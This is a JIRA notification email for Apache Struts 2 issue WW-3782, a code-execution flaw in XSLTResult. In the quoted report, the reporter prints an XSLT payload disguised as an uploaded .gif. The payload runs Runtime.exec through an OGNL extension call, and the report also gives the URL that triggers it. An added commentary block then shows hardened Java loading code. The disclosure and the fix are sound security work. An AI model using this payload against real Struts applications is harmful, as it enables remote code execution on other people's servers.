[ 
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235434#comment-13235434
 ] 

Lukasz Lenart commented on WW-3782:
-----------------------------------

First you're talking about some file upload issue with the XSLT plugin, next 
you're presenting some hardcoded code with call to static methods (which can 
be blocked by setting up configuration flag).

And first of all, please report any security issues through 
[email protected]
                
> struts2 framework XSLTResult local file code execution vulnerability
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2 allows an action to have several result types, including the XSLT type. This type accepts a file location submitted by the user and parses it as an XSLT file, whatever its extension.
> This is the XSLTResult source code:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> // read the value of the user-submitted "xslt.location" parameter
> String pathFromRequest = 
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> // parse the user-submitted file location as XSLT
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> Because of this code, as soon as any single action in the project uses xsltResult, an attacker can make the application parse a file the attacker uploaded as XSLT.
> Example of an action that uses xsltResult:
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT parsing allows Java static methods to be executed, so the attacker only needs to upload a file to the server,
> for example:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
>                version="1.0" xmlns:ognl="ognl.Ognl">
>       <xsl:template match="/">
>               <html> 
>                       <body> 
>                          <h2>hacked by kxlzx</h2> 
>                          <h2>http://www.inbreak.net</h2> 
>                          <exp>
>                                        <xsl:value-of 
> select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
>                               </exp>
>                       </body> 
>               </html> 
>       </xsl:template> 
> </xsl:stylesheet>
> When this xsl file is parsed, it calls the ognl call
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> which leads to arbitrary code execution.
> If the address of an action that returns xslt is
>  
> http://www.inbreak.net/xslt.action
>  
> then the attacker can submit
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> and the result is
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
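The report boils down to two defects in the quoted XSLTResult fragment: the stylesheet path is taken verbatim from the request, and the TransformerFactory is created with extension functions (here the ognl: namespace) enabled. The following added example is not Struts code and not the reporter's code; it is a stand-alone illustration of how a result implementation can load stylesheets safely. It assumes a servlet container (javax.servlet.ServletContext), Java 9+ for Set.of, and the JDK's built-in XSLT processor, which honours FEATURE_SECURE_PROCESSING by rejecting extension-function calls. The stylesheet names in the allowlist are constructed placeholders.

```java
import java.io.InputStream;
import java.util.Set;
import javax.servlet.ServletContext;
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamSource;

/**
 * Hardened stylesheet loader (illustrative, not the Struts XSLTResult).
 *
 * Two controls replace the pattern in the report:
 *  1. The request may only *select* a stylesheet from a fixed allowlist of
 *     files shipped inside the application; it can never supply a path.
 *  2. The TransformerFactory runs with secure processing enabled, so even a
 *     malicious stylesheet cannot call extension functions such as ognl:getValue,
 *     and cannot pull in external DTDs or stylesheets.
 */
public final class SafeXsltTemplates {

    // Constructed allowlist: only stylesheets bundled under WEB-INF may be loaded.
    private static final Set<String> ALLOWED_STYLESHEETS = Set.of(
            "/WEB-INF/xslt/report.xsl",
            "/WEB-INF/xslt/export.xsl");

    private SafeXsltTemplates() {}

    /** Returns true only for a stylesheet that the application explicitly ships. */
    public static boolean isAllowed(String location) {
        return location != null && ALLOWED_STYLESHEETS.contains(location);
    }

    /** Builds a factory that refuses extension functions and external resources. */
    public static TransformerFactory secureFactory() throws TransformerConfigurationException {
        TransformerFactory factory = TransformerFactory.newInstance();
        // Disables extension functions (e.g. xmlns:ognl="ognl.Ognl") in the JDK processor.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Empty string means "no protocols allowed" for external DTDs and xsl:import/include.
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return factory;
    }

    /**
     * Loads the requested stylesheet, or throws if it is not on the allowlist.
     * 'requested' is the raw request parameter; it is compared, never resolved.
     */
    public static Templates load(ServletContext ctx, String requested) throws Exception {
        if (!isAllowed(requested)) {
            throw new IllegalArgumentException("stylesheet not permitted: " + requested);
        }
        try (InputStream in = ctx.getResourceAsStream(requested)) {
            if (in == null) {
                throw new IllegalStateException("bundled stylesheet missing: " + requested);
            }
            return secureFactory().newTemplates(new StreamSource(in));
        }
    }
}
```

With this shape, a parameter such as xslt.location=upload/7758521.gif fails the allowlist check before any file is opened, and a stylesheet that slipped into WEB-INF with an ognl: extension call would still be rejected at compile time by the secure-processing feature rather than executed. Lukasz's remark that static method calls can be blocked by a configuration flag is the Struts-side counterpart of the second control; the allowlist is the fix for the first.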

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: 
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira